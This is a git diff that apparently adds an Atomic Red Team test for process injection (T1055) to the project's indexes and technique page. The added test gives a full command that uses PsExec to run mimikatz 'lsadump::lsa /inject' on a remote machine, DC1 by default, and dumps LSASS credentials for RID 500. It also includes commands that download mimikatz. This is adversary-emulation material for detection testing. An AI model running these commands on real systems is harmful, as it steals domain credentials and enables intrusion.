diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 67809902..e4cf0833 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -53,6 +53,7 @@ privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using Power privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +privilege-escalation,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh @@ -454,6 +455,7 @@ defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +defense-evasion,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index eb51beb2..98ae9b4c 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -101,6 +101,7 @@ privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using Power privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +privilege-escalation,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell @@ -260,6 +261,7 @@ defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +defense-evasion,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 444354bd..f97fbfa7 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -117,6 +117,7 @@ - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: Shellcode execution via VBA [windows] + - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - Atomic Test #1: rc.common [macos] @@ -839,6 +840,7 @@ - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: Shellcode execution via VBA [windows] + - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1216.001 PubPrn](../../T1216.001/T1216.001.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index e2c5f731..78395c09 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -223,6 +223,7 @@ - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: Shellcode execution via VBA [windows] + - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] - [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) - Atomic Test #1: Reg Key Run [windows] - Atomic Test #2: Reg Key RunOnce [windows] @@ -478,6 +479,7 @@ - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: Shellcode execution via VBA [windows] + - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] - [T1216.001 PubPrn](../../T1216.001/T1216.001.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 89005fa7..fd4ef41a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -5967,6 +5967,62 @@ privilege-escalation: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell + - name: Remote Process Injection in LSASS via mimikatz + auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 + description: | + Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). + It must be executed in the context of a user who is privileged on remote `machine`. + + The effect of `/inject` is explained in + supported_platforms: + - windows + input_arguments: + machine: + description: machine to target (via psexec) + type: string + default: DC1 + mimikatz_path: + description: Mimikatz windows executable + type: path + default: "%tmp%\\mimikatz\\x64\\mimikatz.exe" + psexec_path: + description: Path to PsExec + type: string + default: C:\PSTools\PsExec.exe + dependency_executor_name: powershell + dependencies: + - description: 'Mimikatz executor must exist on disk and at specified location + (#{mimikatz_path}) + +' + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + - description: 'PsExec tool from Sysinternals must exist on disk at specified + location (#{psexec_path}) + +' + prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} + +' + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" + Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null + Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + executor: + command: '#{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa + /inject /id:500" "exit" + +' + name: command_prompt + elevation_required: false T1055.008: technique: external_references: @@ -36768,6 +36824,62 @@ defense-evasion: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell + - name: Remote Process Injection in LSASS via mimikatz + auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 + description: | + Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). + It must be executed in the context of a user who is privileged on remote `machine`. + + The effect of `/inject` is explained in + supported_platforms: + - windows + input_arguments: + machine: + description: machine to target (via psexec) + type: string + default: DC1 + mimikatz_path: + description: Mimikatz windows executable + type: path + default: "%tmp%\\mimikatz\\x64\\mimikatz.exe" + psexec_path: + description: Path to PsExec + type: string + default: C:\PSTools\PsExec.exe + dependency_executor_name: powershell + dependencies: + - description: 'Mimikatz executor must exist on disk and at specified location + (#{mimikatz_path}) + +' + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + - description: 'PsExec tool from Sysinternals must exist on disk at specified + location (#{psexec_path}) + +' + prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} + +' + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" + Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null + Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + executor: + command: '#{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa + /inject /id:500" "exit" + +' + name: command_prompt + elevation_required: false T1055.008: technique: external_references: diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index dc781f76..f57dcfe4 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -12,6 +12,8 @@ More sophisticated samples may perform multiple process injections to segment mo - [Atomic Test #2 - Shellcode execution via VBA](#atomic-test-2---shellcode-execution-via-vba) +- [Atomic Test #3 - Remote Process Injection in LSASS via mimikatz](#atomic-test-3---remote-process-injection-in-lsass-via-mimikatz) +
@@ -105,4 +107,67 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th +
+
+ +## Atomic Test #3 - Remote Process Injection in LSASS via mimikatz +Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). +It must be executed in the context of a user who is privileged on remote `machine`. + +The effect of `/inject` is explained in + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| machine | machine to target (via psexec) | string | DC1| +| mimikatz_path | Mimikatz windows executable | path | %tmp%\mimikatz\x64\mimikatz.exe| +| psexec_path | Path to PsExec | string | C:\PSTools\PsExec.exe| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +#{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) +##### Check Prereq Commands: +```powershell +$mimikatz_path = cmd /c echo #{mimikatz_path} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +$mimikatz_path = cmd /c echo #{mimikatz_path} +Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" +Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force +New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null +Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force +``` +##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) +##### Check Prereq Commands: +```powershell +if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" +Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force +New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null +Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force +``` + + + +